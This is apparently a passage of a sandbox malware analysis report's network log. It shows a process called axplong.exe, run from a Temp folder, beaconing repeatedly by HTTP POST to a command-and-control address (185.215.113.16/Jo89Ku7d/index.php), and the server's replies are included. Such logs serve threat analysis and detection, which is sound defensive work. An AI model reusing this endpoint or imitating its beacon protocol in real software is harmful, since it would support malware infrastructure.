                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.665101185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:47.638288021 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:48.358087063 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:48.359149933 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:48.590025902 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.665102185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:48.701088905 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:49.401583910 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:49.402457952 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:49.627460003 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.665103185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:49.747351885 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:50.440229893 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:50.441426039 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:50.666389942 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.665104185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:50.778734922 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:51.484373093 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:51.485218048 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:51.711504936 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.665105185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:51.828345060 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:52.535466909 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:52.538497925 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:52.761044979 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.665106185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:52.872567892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:53.608582020 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:53.610451937 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:53.848117113 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  46192.168.2.665107185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:53.967271090 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:54.678500891 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:54.679599047 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:54.906187057 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  47192.168.2.665108185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:55.012929916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:55.739972115 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:55.740757942 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:55.973352909 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  48192.168.2.665109185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:56.091054916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:56.797980070 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:56.798801899 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:57.027661085 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  49192.168.2.665110185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:57.140134096 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:57.875601053 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:57.876549959 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:58.112724066 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  50192.168.2.665111185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:58.231508017 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:58.930130959 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:58.931102037 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:59.155163050 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  51192.168.2.665113185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
